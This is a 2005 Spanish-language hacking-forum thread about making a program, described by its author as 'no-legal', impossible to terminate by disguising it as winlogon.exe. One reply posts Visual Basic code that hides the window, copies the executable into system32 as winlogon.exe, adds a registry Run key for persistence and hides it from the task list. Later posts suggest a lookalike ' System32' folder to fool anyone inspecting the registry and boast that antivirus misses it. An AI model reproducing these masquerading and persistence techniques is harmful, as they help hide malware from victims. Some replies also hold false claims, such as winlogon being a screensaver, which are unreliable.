|
Título: Proceso Protegido Publicado por: NYlOn en 30 Septiembre 2005, 04:31 am Bueng0 gente, les keria compartir un codigo cencillisimo que acabo de hacer y que me parecio muy util ;D
Este codigo iria en el Load del 1er from que se ejecuta, y lo que hace es copiar el ejecutable en otro directorio con el nombre 'Winlogon.exe' (con este nombre, el proceso no puede ser terminado ;)), luego se cierra y habre la nueva copia. De este modo nuestro programa 'no-legal' no puede ser terminado.... Esper0 q les sea de utilidad Código: Private Sub Form_Load() NOTA: si vas a probar este ejemplo en tu pc, te conviene dejar el From visible y con un boton para finalizar el programa, ya que de otro modo va a ser imposible terminarlo (RESET xD) esper0 que les sirva, y si no c entiende alg0 posteen (pero me parece q esta bien clarito :P) salu2 !!! G0nz4 Título: Re: Proceso Protegido Publicado por: Alpha_ en 30 Septiembre 2005, 05:24 am Hmm lo voy a probar.. de verdad que es interminable simplemente por llamarse WinLogon?
Me resulta muy raro, puesto que el tema de los privilegios es un poco más avanzado que un simple nombre. Título: Re: Proceso Protegido Publicado por: Slasher-K en 30 Septiembre 2005, 06:36 am Juaz, vaya seguridad de Windows. Copié el ejecutable del bloc de notas y le cambié el nombre a winlogon.exe, no lo deja eliminar de la lista de procesos :-X
Cada día me sorprendo más de este sistema xD. Gracias por el aporte NYlOn. Saludos. Título: Re: Proceso Protegido Publicado por: yeikos en 30 Septiembre 2005, 09:11 am Esto no es nuevo, existe otros procesos de windows en los que sucede lo mismo, así como lsass.exe .
Título: Re: Proceso Protegido Publicado por: NYlOn en 30 Septiembre 2005, 20:20 pm De nada :)
Es un placer aportar algo a esta comunidad que tanto me enseña ^^ ak algunos otros proceso que no pueden ser terminados: -Csrss.exe -Winlogon.exe -Lsass.exe -Smss.exe -Services.exe y deve haber un par mas... pero son to2 los q recuerdo xD ------------------------------------ Citar el tema de los privilegios es un poco más avanzado que un simple nombre. -No en Win XP ;Dun salud0 G0nz4 Título: Re: Proceso Protegido Publicado por: Numeros en 30 Septiembre 2005, 20:37 pm :D Buenísimo!! tremendo aporte NYlOn.. ahora si que estas hecho un hacker de alta peligrosidad ;D
Citar Juaz, vaya seguridad de Windows. Copié el ejecutable del bloc de notas y le cambié el nombre a winlogon.exe, no lo deja eliminar de la lista de procesos Cada día me sorprendo más de este sistema xD. Bueno mi modesta opinión debian haber pensado los de microsoft en no permitir que dos procesos de igual nombre esten corriendo al mismo tiempo, pero en fín, a lo mejor es así por razones que ignoro.. solo estoy conjeturando.. Salu2 Título: Re: Proceso Protegido Publicado por: Ch3ck en 30 Septiembre 2005, 20:53 pm Bien por el aporte NYLOn, pero me sorprende un poco que casi nadie lo sepa (entre ellos estaba yo) puesto que ya tu habias hablado sobre esto en algunos post ejem: http://foro.elhacker.net/index.php/topic,88232.0.html ;D
Título: Re: Proceso Protegido Publicado por: NYlOn en 1 Octubre 2005, 00:29 am No mucha gente lee los posts enteros (me incluyo xDDD)
salu2 Título: Re: Proceso Protegido Publicado por: _Sergi_ en 1 Octubre 2005, 17:48 pm Joder estoy asombrado
Buen trabajo NYlOn. Título: Re: Proceso Protegido Publicado por: NYlOn en 5 Octubre 2005, 22:23 pm Gracias :)
Título: Re: Proceso Protegido Publicado por: la caca en 7 Octubre 2005, 18:53 pm jojojooj y eso combinado con esto:
Set obj = CreateObject("Scripting.FileSystemObject") 'declaramos un objeto tipo fileSystem object Set win = obj.GetSpecialFolder(0) 'para obtener la carpeta de windows y system Set sys = obj.GetSpecialFolder(1) win = LCase(win) 'las ponemos en minusculas sys = LCase(sys) Form1.Visible = False 'ponemos invisible '-----Copia a \windows-------------- Dim ejec As String ejec = App.EXEName & ".exe" 'añadimos ala ruta del exe, el nombre y la estension FileCopy ejec, sys & "\winlogon.exe" 'copia a windows\system32 End If Set residencia = CreateObject("WScript.Shell") residencia.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\" & "winlogon", win & "\winlogon.exe" 'esto modifica el registro para que se ejecute al iniciar el pc App.TaskVisible = False 'para ocultarlo un poco del, (alt +sup +control) (aunque es una bosta jejej no funciona en XP) bueno espero que les sirva para copiar todo en la carpeta windows jejeje p.D.: usenlo con el codigo de NYlOn chau Título: Re: Proceso Protegido Publicado por: A2Corp en 7 Octubre 2005, 19:14 pm una pregunta... que en System32 no esta el proceso original de winlogon.exe???????
Esto no afectaria a nuestro copy? o no dañaria al archivo de winlogon.exe original? y para editar el registro mejor usa apis!, pke esos scripts seran detectados como virus... Saludos! Título: Re: Proceso Protegido Publicado por: la caca en 7 Octubre 2005, 19:30 pm me importa un bledo que este el winlogon jejej total se va a romper lo mismo la pc jjejej
che haber pasate las funciones api para modificar el registro si?? Título: Re: Proceso Protegido Publicado por: NYlOn en 7 Octubre 2005, 19:36 pm Si, dañaria el archivo original :S
Lo q se puede hacer es crear una carpeta en %WindowsRoot% con el nombre de " System32" Si se fijan bien hay un espacio adelante de "System32", echo con el ALT + 0160.. De esta forma, si alguien se fija en el Registro, aparecera (x ej) "C:\Windows\ System32\Winlogon.exe", x lo que se asemejaria bastante a la realidad :P (Ahora, esperemos que no revise su carpeta de Win muy seguido pq se daria cuenta xDDD) Sino lo podemos guardar en la carpeta de Windows y chau problema :p salu2 ! ah y tengo entendido que eso del los objetos en Script los detectan los antivirus, pero yo tengo el NAV 2004 y no dice ni Mu xD EDIT: Citar me importa un bledo que este el winlogon jejej total se va a romper lo mismo la pc La idea no era para dañar el sistema, solo para q no se pueda terminar alguna aplicacion... Y BUSCA (http://www.google.com) un poco sobre las API's, en el foro hay mucho tmb... Título: Re: Proceso Protegido Publicado por: yeikos en 7 Octubre 2005, 21:44 pm Windows hace un resguardo de sus archivos más 'importantes', así como taskmsg, regedit y demás, por lo tanto si borramos el archivo winlogon.exe supuestamente al reiniciar windows creará de nuevo este archivo.
PD: Winlogon tan solo es un salvapantallas, no podría originar daños en el ordenador, nada más que cuando apareciera el salvapantallas tras una inactividad se ejecutará este archivo. Título: Re: Proceso Protegido Publicado por: A2Corp en 7 Octubre 2005, 21:51 pm Ohhhhhh........ Gracias por decirme eso, no se pke kreia que winlogon.exe era algo relacionado con la entrada de windows xD... Ese que te pone cuando eskoges el usuario para entrar xD.
Título: Re: Proceso Protegido Publicado por: byebye en 7 Octubre 2005, 23:21 pm winlogon no es un salvapantallas. el tema de "que no se puede cerrar el proceso", eso pasa en todos los sitemas (w2k/xp) pq los servicios "no puedes" cerrarlos. tu mismo puedes ajustar los privilegios a tu preceso para que puede cerrar winlogon y todos los demas.
Título: Re: Proceso Protegido Publicado por: _Sergi_ en 8 Octubre 2005, 01:30 am Pues vaya con los programadores de Microsoft... ¿Nunca pensaron que cualquiera puede renombrar un archivo?
Título: Re: Proceso Protegido Publicado por: NYlOn en 8 Octubre 2005, 01:53 am Citar tu mismo puedes ajustar los privilegios a tu preceso para que puede cerrar winlogon y todos los demas. Nunca habia oido esto, podrias decirme como ?? ;D desde ya muchas gracias ^^ salu2 ! Título: Re: Proceso Protegido Publicado por: byebye en 8 Octubre 2005, 17:26 pm Citar (SeDebugPrivilege) Permite al usuario asignar un depurador a cualquier proceso. El privilegio SeDebugPrivilege permite cambiar el flujo de ejecución de cualquier proceso o matarlo (incluyendo los subsistemas de seguridad o cualquier servidor RPC). solo te queda buscar un poco. Título: Re: Proceso Protegido Publicado por: NYlOn en 8 Octubre 2005, 19:20 pm ;D
gracias ^^ Título: Re: Proceso Protegido Publicado por: NYlOn en 17 Octubre 2005, 04:15 am Citar si borramos el archivo winlogon.exe supuestamente al reiniciar windows creará de nuevo este archivo. Eso borraria nuestro programa... Lo mejor seria crearlo en la carpeta de Windows, no en System32 EDIT Citar Winlogon tan solo es un salvapantallas Descripción: WinLogon.exe es el gestor de login en Windows NT. Maneja los procedimientos de login y logout a tu sistema. winlogon.exe es un proceso esencial del sistema y no debe ser terminado. FUENTE: http://www.yoreparo.com/procesos/winlogon.exe.html Título: Re: Proceso Protegido Publicado por: sch3m4 en 17 Octubre 2005, 15:58 pm eso es por el sistema de protección de archivos, si lo desactivas no lo vuelve a restaurar. Y no lo restaura cuando reinicia, sino en el momento en que se da cuenta de que ha sido alterado.
|